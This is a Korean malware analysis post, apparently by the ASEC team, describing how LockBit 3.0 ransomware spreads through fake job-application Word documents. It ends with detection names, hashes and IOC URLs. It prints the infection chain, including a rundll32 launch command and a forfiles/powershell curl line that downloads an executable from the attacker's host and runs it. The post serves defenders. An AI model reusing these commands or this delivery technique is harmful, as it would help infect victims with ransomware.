워드 문서를 통해 유포되는 LockBit 3.0 랜섬웨어

ASEC 분석팀은 9/23 공유한 <입사지원 위장 메일로 유포 중인 NSIS형태의 LockBit 3.0 랜섬웨어>가 워드 문서 형태로도 유포되는 것을 확인하였다. 정확한 유포 경로는 확인되지 않았으나, 유포 파일명으로 ‘임규민.docx’, ‘전채린.docx’ 등 사람 이름을 사용하는 것으로 보아 전과 유사하게 입사지원서를 위장하여 유포되었을 것으로 추정된다.

확인된 워드 문서 내부 word\_rels\settings.xml.rels 파일에 External 링크가 존재한다. 이로 인해 문서 파일 실행 시 hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm에 접속하여 추가 dotm 파일을 다운로드한다.

문서 파일 내부에는 매크로 사용을 유도하는 이미지가 존재한다. 다운로드 된 dlx5rc.dotm에는 VBA 매크로가 포함되어 있어 사용자가 콘텐츠 사용 버튼 클릭 시 악성 매크로가 실행된다.

dotm 파일에 존재하는 VBA 매크로 코드는 다음과 같다.

코드 내부 문자열들은 난독화 되어 있으며 CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8)를 사용하는 것이 특징이다. VBA 매크로 실행 시 C:\Users\Public\ 폴더에 skeml.lnk 파일을 생성한다. 해당 링크 파일의 TargetPath는 forfiles.exe이며, rundll32.exe를 통해 실행된다. 링크 파일을 실행하는 명령어는 다음과 같다.

• rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

링크 파일 실행 시 파워쉘 명령어를 통해 hxxp://ppaauuaa11232[.]cc/aaa.exe에서 추가 악성 파일을 다운로드하여 C:\Users\Public\156498415616651651984561561658456.exe로 저장 및 실행한다. LNK 파일을 통해 실행되는 명령어는 다음과 같다.

• forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”

현재 다운로드 되는 156498415616651651984561561658456.exe 파일은 NSIS형태의 LockBit 3.0 랜섬웨어로 아래 글과 동일한 유형의 악성코드이다.

입사지원 위장 메일로 유포 중인 NSIS형태의 LockBit 3.0 랜섬웨어 – ASEC BLOG

ASEC 분석팀은 LockBit 2.0 랜섬웨어가 메일을 통해 유포되고 있음을 지난 2월, 6월에 걸쳐 블로그에 게시한 바 있는데, 새로운 버전의 LockBit 3.0 랜섬웨어가 유사 방식을 통해 여전히 다수 유포 중 임을 알리고자 한다. 지난 6월에는 저작권 사칭 메일로 다수 유포가 되었던 반면 최근에는 입사지원 관련으로 위장한 피싱 메일을 통해 유포 중이다. 위 메일 캡처와 같이 첨부된 압축 파일명 자체에 압축 비밀번호가 명시된 경우가 있지만, 압축 파일명에 명시하지 않고 메일 본문에 압축 비밀번호를 명시한 케이스도 확인되었다.…

최근 LockBit 랜섬웨어가 다양한 방식으로 유포되고 있어 사용자의 주의가 필요하다. 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용하고 출처를 알 수 없는 문서 파일 실행을 자제해야 한다.

[파일 진단]
Downloader/DOC.External (2022.09.23.03)
Downloader/XML.External (2022.09.23.03)
Downloader/XML.Generic (2022.09.24.00)
Downloader/LNK.Powershell (2022.09.23.03)
Ransomware/Win.LockBit.C5243202 (2022.09.23.03)

[행위 진단]
Malware/MDP.Download.M1197  
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171

 

MD5

2d8b6275dee02ea4ed218ba2673b834e

45dfdde3df07b6ccc23b7ae6e3dc1212

738bee5280d512a238c3bb48c3278f63

77c5fb080bf77f099c5b5f268dcf4435

7b74e4fb9a95f41d5d9b4a71a5fe40b9

URL

http[:]//ppaauuaa11232[.]cc/aaa[.]exe

http[:]//ppaauuaa11232[.]cc/dlx5rc[.]dotm